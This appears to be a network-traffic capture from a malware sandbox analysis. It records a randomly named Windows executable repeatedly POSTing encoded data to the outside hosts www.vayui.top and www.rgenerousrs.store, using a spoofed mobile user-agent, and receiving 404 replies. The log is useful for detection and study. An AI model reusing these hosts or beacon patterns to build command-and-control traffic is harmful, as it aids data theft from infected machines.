Nov 24, 2024 08:14:46.687326908 CET	759	OUT	POST /vg0z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/vg0z/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 51 32 53 7a 45 7a 57 6b 53 59 70 72 4d 36 4b 2f 52 4f 71 66 73 72 72 56 55 64 2b 51 3d 3d Data Ascii: 6vSXrZxp=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZQ2SzEzWkSYprM6K/ROqfsrrVUd+Q==
Nov 24, 2024 08:14:47.949179888 CET	891	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:14:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7bFXhafSdat23BO4kabOB%2BYgPSQPnB39wCQnVpHhgysx0pM8gUkAfZz3aD2Du%2F5jU2bfQqJgEW1iCKWle35SgrBwbsNsXzdCHy642LpyG%2FfFziYuFuUa03V8TssY3bX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779aa7bf1141cd-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1536&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.9	49993	172.67.145.234	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:49.344791889 CET	1772	OUT	POST /vg0z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/vg0z/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 75 30 51 56 54 38 59 6e 4c 58 6e 43 72 30 74 4c 50 62 4f 6a 6f 50 6e 57 77 34 7a 58 55 38 39 37 46 7a 70 48 46 5a 6a 6b 46 6c 62 4b 43 45 6b 37 34 5a 56 6a 5a 74 73 69 65 2f 55 67 75 74 56 70 4b 62 46 4b 4c 55 4a 65 61 2b 79 41 59 48 6a 52 4f 78 75 35 41 63 5a 71 6c 4a 66 4b 55 53 59 34 71 76 36 2b 77 51 7a 4f 66 5a 43 62 4a 42 77 43 44 66 44 55 6f 31 62 32 75 73 43 38 6d 57 76 31 4a 73 74 70 6e 5a 31 67 45 4a 43 59 55 57 64 53 59 6d 62 43 71 66 6e 37 74 64 53 65 64 44 31 39 78 41 67 47 5a 35 71 6b 59 79 33 62 62 61 73 31 56 48 36 56 73 6c 54 79 52 2b 55 34 70 55 71 37 2b 70 47 63 79 61 46 4a 77 55 61 74 51 46 68 52 6d 36 59 64 74 66 2f 36 5a 35 2b 53 4b 71 58 4b 41 31 57 36 79 79 6d 73 30 50 70 6f 2f 71 74 52 65 59 52 6b 6b 79 66 68 46 46 78 59 45 44 6d 2b 4e 52 33 46 6a 32 45 48 4e 39 43 45 39 77 53 30 59 39 6f 39 37 71 36 69 6d 42 38 75 6c 67 75 [TRUNCATED] Data Ascii: 6vSXrZxp=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1JstpnZ1gEJCYUWdSYmbCqfn7tdSedD19xAgGZ5qkYy3bbas1VH6VslTyR+U4pUq7+pGcyaFJwUatQFhRm6Ydtf/6Z5+SKqXKA1W6yyms0Ppo/qtReYRkkyfhFFxYEDm+NR3Fj2EHN9CE9wS0Y9o97q6imB8ulgui9W3wa64FtfJGAy7OicV4nvgzBKEHLnYOY5ccDdfTglSey9NhlRWoTdfqCuFQ7S/i84Qc8r+coxpo6Ghrl4OiDmQxHx/1sDhzc+tKjmGM/eZMfYudAtKmsAmq/2JPp2PDuv9oJUrJtIJ9o6GxodcZ8rL+yjsGSFhvdZw3u1yD70FGaCa58KZkkxJ2y0OG/G1pDqJg40H1ULEYarBzM12ipHfoY0H1IpvA//SCrsxZ8/kNZ19CdauqcwyeHN6f1ZcV+2PnlMMRCTGZ66KvL2cqWVRSRVo1myUS43fjB2pM6iJ14hJzNHUOaGM/uE5F0ZkeeXWj2XulX61q9C0clU1pTmCU/6QwIZJZvHNCLyWMwERhoeRNBIRGclRX1kNUPZs3P8IIfbeIfBd79xfhFZEz16lzIk4MBBsYbi4ghoE89E/maQKSkMiTXdg7i2FLF8U/Alh00QDa3W2XqTRcFLSyW1f6Hp014BkMCCHcgRIjrHMBH8pM4c9A7+Yz3NE0jYqGTMj4Mn7zHj3ijf4t8X6bsY0HxQXQEdx7KiEqWzxcnRJOvmH8/dt6A/tuosb7t/9BaFZf26oAmZdCrLZlTgalQg62kkJfMBZXCSVByvwI5LSuDXrnVh30PMfIYfvRdTb/X//062kIbwGKXt5nVTCnFYNpQ6TJlDow/ [TRUNCATED]
Nov 24, 2024 08:14:50.600850105 CET	888	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:14:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJBwL%2FE7MdPJiZj5Fzv6WHu%2FlKg42kBQnPg%2B%2FBxVwscGd7LQSCu1R6giAiOozMr0Jg31KCASO0eKk0fpSsMgPOrbS9APGWVVL%2Bu9VITSzMrkV8EsU%2BNeuKPMBPXzoDrq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779ab868d04399-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1772&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.9	49994	172.67.145.234	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:52.015127897 CET	475	OUT	GET /vg0z/?6vSXrZxp=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTW6XWjcMaa2pZqz34d1+1Sa3fEZ+ULw==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.vayui.top Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:14:53.272583961 CET	904	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fbdKsZDdU%2BNFDbk%2B86iERBeQFZ2q6uNUvPLGYvNb2mbMONwB5cTZW%2FbFuZM%2FGvUDmMgTUqiulVX5XCCxP8fdfA%2BKSWqcNElgbxXii26coNW9xH%2FCYW%2BDNR0p%2Foo9K48"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779ac91e5a1a40-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=475&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.9	49995	172.67.167.146	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:58.839129925 CET	759	OUT	POST /o362/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.rgenerousrs.store Origin: http://www.rgenerousrs.store Referer: http://www.rgenerousrs.store/o362/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6e 72 73 4e 61 54 72 6a 31 51 76 51 36 70 5a 79 7a 4f 51 64 6a 2f 48 67 61 43 4f 51 Data Ascii: 6vSXrZxp=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNnrsNaTrj1QvQ6pZyzOQdj/HgaCOQ
Nov 24, 2024 08:15:00.279894114 CET	1067	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:00 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Ivejsjobhv6doc0HZEBkbHe9qHMvgjrPwHFavykbpoguEAAWrQsGzDAHy3cx4DfN05Px0EXkgxt9hbzxRY2G%2FGEUcVK6TiXFt7mgr6pyDwkss8b6i578F2I2t7W2Zy5BGRw%2FlGJZ5A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779af3c8d45e62-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49996	172.67.167.146	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:01.499948978 CET	783	OUT	POST /o362/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.rgenerousrs.store Origin: http://www.rgenerousrs.store Referer: http://www.rgenerousrs.store/o362/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 48 48 64 6c 48 34 62 46 55 52 39 75 71 4e 6d 43 6c 49 41 72 75 65 34 76 30 51 67 41 3d 3d Data Ascii: 6vSXrZxp=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oHHdlH4bFUR9uqNmClIArue4v0QgA==
Nov 24, 2024 08:15:02.944839954 CET	1065	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:02 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XjiIe9cHNjlJXZjJNl6ZGWjlP7RSQaG758O2lPR1zKcOVpBegzdJUCikdwN353Wy9xMvSSGONY91vU4QNy46511Iuk9qMh91tpoZ%2FsvJr45C7Ba2MbKkIuZSnrGnoneKZZkZ9WZ220%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b045f398c65-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI8b
Nov 24, 2024 08:15:02.945843935 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49997	172.67.167.146	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:15:04.156848907 CET	1796	OUT	POST /o362/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.rgenerousrs.store Origin: http://www.rgenerousrs.store Referer: http://www.rgenerousrs.store/o362/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 50 67 52 73 61 54 4c 66 6e 54 42 42 6a 73 68 35 4f 6e 4b 32 77 6b 75 51 36 50 62 30 38 5a 56 39 4d 62 70 34 39 46 30 74 6f 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 69 65 73 37 66 34 4f 70 62 50 32 71 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 [TRUNCATED] Data Ascii: 6vSXrZxp=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzDspOIalPgRsaTLfnTBBjsh5OnK2wkuQ6Pb08ZV9Mbp49F0to0Uw33QgqFFWL4P6zfHLjffpEl+AeS8RDglcawaYmzpSWyeZ5kAhtwCxQyjJuyTies7f4OpbP2qrCwsylMqbf6HIpCQRHq7wY/J/USWydPjNv4pUa2jthQ9+xx4mXXL/bshwJeHaFw3A5TkOsGrXBx1nCH6pn4il7krw0YylXZi9FgDO6Uv3pCatX3Z/euGoirZ0hLi6ebpLzzfVDXgbD6O6zKz46rTVxcGQRuNuFeTayzZ1sy4dsUMOLqDFjirPW/Lktn2+6m/p+YgcxyFn1cMOVYiaEUFx7aOUJFuS103E1o0C3Ln/NgozyXnhtwjKujqn3ihHOg3/XRexSW7HV7fCoGJLWw7wj+psk0UXuENcpWs2uNpsD04IqxegGcq3YWd6eHYhSV/1EiP5uAmJJ+Z2PblgqD3GiWS82BNxMQ1fkbd7AWFBB/uapvfIAx9zBkkmn4dUaXCa35ZUOlJSBku6o78YOpZYJEnX3+dKhgZlpcgeUs0LNlNGwUuWfySm/2VwYnXWB9fXiFWLAHxAYboqv4AXPR++LS/mmY4OQCm1twEyd+kuVm5ioyCBHFbehYG+jHx4jok58XDA/L9qQ1Q8IuQP9y/pQEMZDd47f//rQ4JhJM58aa5gGtCAmmvp9fI6/wPETRZh+ANyZH1HLSsuM5SwJXvWvfRUs8V2+WtXTm5rqNd8/kDiN0iMYqthJ54N/fIaJNEMjOJDcLPmByEeRZ6Os8rcDf9/TsQk0BWbBcUnRh1Jjf1DSpS8+mOZ9BZog3Tkm+i7elCkUj [TRUNCATED]
Nov 24, 2024 08:15:05.598087072 CET	1075	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:15:05 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXWTKEGLRqfcyBwiX4pCmTtofiGyZYeR27Mpug%2B2YB%2BxrqJ7D6o90by5dKrQQJ7bQDcRtRGr1jTXSBKZ8vDGDjFnXswCTWbrVJt32Nry6RFHmb861Srs521EEho%2BHPn51glcH6L7w9Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779b14fafc431c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(r8;?t,7oR]0nJ;_F'\|"od1d.kn^fLqeb2&je-pI8b0
